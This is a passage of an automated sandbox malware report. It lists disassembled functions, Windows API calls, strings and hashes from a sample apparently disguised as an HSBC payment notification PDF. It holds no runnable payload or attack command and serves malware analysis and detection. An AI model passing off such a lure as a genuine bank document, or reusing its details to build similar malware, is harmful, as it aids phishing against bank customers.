                                                                                                                                                    • Opcode Fuzzy Hash: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
                                                                                                                                                    • Instruction Fuzzy Hash: 0B41E531000100EFDB215F68DC8CBBA3B65EB46331F1442BAFE619A2E1C7758C86DB69
                                                                                                                                                    Function 0046A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CharLowerBuffW.USER32(?,?,0048F910), ref: 0046A90B
                                                                                                                                                    • GetDriveTypeW.KERNEL32(00000061,004B89A0,00000061), ref: 0046A9D5
                                                                                                                                                    • _wcscpy.LIBCMT ref: 0046A9FF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                    • API String ID: 2820617543-1000479233
                                                                                                                                                    • Opcode ID: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
                                                                                                                                                    • Instruction ID: 63d5a068ad5a56aba220708db6a6aa365c702eef260e2cf9077a2f95fd26ae7a
                                                                                                                                                    • Opcode Fuzzy Hash: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
                                                                                                                                                    • Instruction Fuzzy Hash: 6751AE711183009BC700EF15C892AAFB7E5EF94308F544C2FF495672A2EB399D19CA5B
                                                                                                                                                    Function 00487152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 0048716A
                                                                                                                                                    • CreateMenu.USER32 ref: 00487185
                                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 00487194
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487221
                                                                                                                                                    • IsMenu.USER32(?), ref: 00487237
                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00487241
                                                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0048726E
                                                                                                                                                    • DrawMenuBar.USER32 ref: 00487276
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                                    • String ID: 0$F
                                                                                                                                                    • API String ID: 176399719-3044882817
                                                                                                                                                    • Opcode ID: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                                                                                                                                                    • Instruction ID: ef621a00a8965f8f9a50d7f8a7e1c0e3a51c02c5d80a3ac9dc969039337b3b35
                                                                                                                                                    • Opcode Fuzzy Hash: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
                                                                                                                                                    • Instruction Fuzzy Hash: 2A419B74A01204EFDB10EF64D898E9E7BB5FF09300F240469F915A7361D735A910DF98
                                                                                                                                                    Function 00426E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 00426E3E
                                                                                                                                                      • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                                                                                    • __gmtime64_s.LIBCMT ref: 00426ED7
                                                                                                                                                    • __gmtime64_s.LIBCMT ref: 00426F0D
                                                                                                                                                    • __gmtime64_s.LIBCMT ref: 00426F2A
                                                                                                                                                    • __allrem.LIBCMT ref: 00426F80
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426F9C
                                                                                                                                                    • __allrem.LIBCMT ref: 00426FB3
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426FD1
                                                                                                                                                    • __allrem.LIBCMT ref: 00426FE8
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00427006
                                                                                                                                                    • __invoke_watson.LIBCMT ref: 00427077
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 384356119-0
                                                                                                                                                    • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                                                    • Instruction ID: cc18d51bddcb3bff235d9ba930da6ebb912618c2495e950f743dda1aeb2a8d13
                                                                                                                                                    • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                                                    • Instruction Fuzzy Hash: F8710876B00726ABD714AF79EC41B5BB3A4AF04328F55412FF514D7281EB78ED048B98
                                                                                                                                                    Function 00462527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 00462542
                                                                                                                                                    • GetMenuItemInfoW.USER32(004C5890,000000FF,00000000,00000030), ref: 004625A3
                                                                                                                                                    • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 004625D9
                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 004625EB
                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 0046262F
                                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 0046264B
                                                                                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00462675
                                                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 004626BA
                                                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00462700
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462714
                                                                                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462735
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4176008265-0
                                                                                                                                                    • Opcode ID: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                                                                                                                                                    • Instruction ID: d041e2a6511ad081bd824cff42eca7b157938f8ca15e77e0b80393dec237999e
                                                                                                                                                    • Opcode Fuzzy Hash: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                                                                                                                                                    • Instruction Fuzzy Hash: 3361B470900A49BFDB11CF64CE84DBF7BB8FB01345F14046AE842A7251E7B9AD05DB2A
                                                                                                                                                    Function 00486F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00486FA5
                                                                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00486FA8
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00486FCC
                                                                                                                                                    • _memset.LIBCMT ref: 00486FDD
                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00486FEF
                                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00487067
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$LongWindow_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 830647256-0
                                                                                                                                                    • Opcode ID: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                                                                                                                                                    • Instruction ID: 7132dcb9391edd1f4fca7d59f8acd98ed1f58d557d43f29f177e0b8d5bde9df6
                                                                                                                                                    • Opcode Fuzzy Hash: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                                                                                                                                                    • Instruction Fuzzy Hash: 17618E75900208AFDB10EFA4CC85EEE77B8EB09700F20056AFA14A73A1C775AD51DB64
                                                                                                                                                    Function 00456B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00456BBF
                                                                                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00456C18
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00456C2A
                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00456C4A
                                                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00456C9D
                                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00456CB1
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00456CC6
                                                                                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00456CD3
                                                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CDC
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00456CEE
                                                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CF9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2706829360-0
                                                                                                                                                    • Opcode ID: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                                                                                                                                                    • Instruction ID: 21fd5a8c16b11a42553d074c3324144f158a868588d4a73b9a3ed32873cef97c
                                                                                                                                                    • Opcode Fuzzy Hash: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                                                                                                                                                    • Instruction Fuzzy Hash: F1418231A001199FCF00DFA9D8449AEBBB9EF18315F01847EE955E7362CB34A949CF94
                                                                                                                                                    Function 004783BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                    • CoInitialize.OLE32 ref: 00478403
                                                                                                                                                    • CoUninitialize.OLE32 ref: 0047840E
                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00492BEC,?), ref: 0047846E
                                                                                                                                                    • IIDFromString.OLE32(?,?), ref: 004784E1
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0047857B
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 004785DC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                    • API String ID: 834269672-1287834457
                                                                                                                                                    • Opcode ID: bddeeabf73b366b14407c3e71f23e64711764d0829d4ad9168793951bdc54c34
                                                                                                                                                    • Instruction ID: cb75df2b24e16c1c2e0b5d8d850f15e0fc33cba1d2aa6ec0deb68a9cf625d14d
                                                                                                                                                    • Opcode Fuzzy Hash: bddeeabf73b366b14407c3e71f23e64711764d0829d4ad9168793951bdc54c34
                                                                                                                                                    • Instruction Fuzzy Hash: AA61C170648312AFC710DF14C848B9FB7E8AF44744F00881EF9899B291DB78ED48CB9A
                                                                                                                                                    Function 0046B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0046B4D0
                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0046B546
                                                                                                                                                    • GetLastError.KERNEL32 ref: 0046B550
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 0046B5BD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                    • API String ID: 4194297153-14809454
                                                                                                                                                    • Opcode ID: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                                                                                                                                                    • Instruction ID: 3fb85926d1a8df40b98e85eadc692d0a6e2328ff5e483d9ffe01cb822ebdbf3c
                                                                                                                                                    • Opcode Fuzzy Hash: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                                                                                                                                                    • Instruction Fuzzy Hash: 29318675A00205AFCB00EB68C845AEE77B4FF45318F10416BF506D7291EB799E86CB9A
                                                                                                                                                    Function 00458F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                      • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00459014
                                                                                                                                                    • GetDlgCtrlID.USER32 ref: 0045901F
                                                                                                                                                    • GetParent.USER32 ref: 0045903B
                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0045903E
                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00459047
                                                                                                                                                    • GetParent.USER32(?), ref: 00459063
                                                                                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00459066
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                    • API String ID: 1536045017-1403004172
                                                                                                                                                    • Opcode ID: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
                                                                                                                                                    • Instruction ID: 6714b25adca5f569a88cfbaafbe7bd2dd1ba81f724cd7e2599907f028ed7346a
                                                                                                                                                    • Opcode Fuzzy Hash: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
                                                                                                                                                    • Instruction Fuzzy Hash: D021D870A00108BFDF04ABA1CC85EFEB774EF45310F10062AF911672E2DB795819DB28
                                                                                                                                                    Function 0045907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                      • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                                                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004590FD
                                                                                                                                                    • GetDlgCtrlID.USER32 ref: 00459108
                                                                                                                                                    • GetParent.USER32 ref: 00459124
                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00459127
                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00459130
                                                                                                                                                    • GetParent.USER32(?), ref: 0045914C
                                                                                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0045914F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                    • API String ID: 1536045017-1403004172
                                                                                                                                                    • Opcode ID: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
                                                                                                                                                    • Instruction ID: 4d8cd3b83cca1d69534b37f7086261ba2dc9307f4c099413b547fbd15d3c7d68
                                                                                                                                                    • Opcode Fuzzy Hash: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
                                                                                                                                                    • Instruction Fuzzy Hash: AA21B674A00108BFDF01ABA5CC85EFEBB74EF44301F50452BB911A72A2DB795819DB29
                                                                                                                                                    Function 00459163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetParent.USER32 ref: 0045916F
                                                                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00459184
                                                                                                                                                    • _wcscmp.LIBCMT ref: 00459196
                                                                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00459211
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
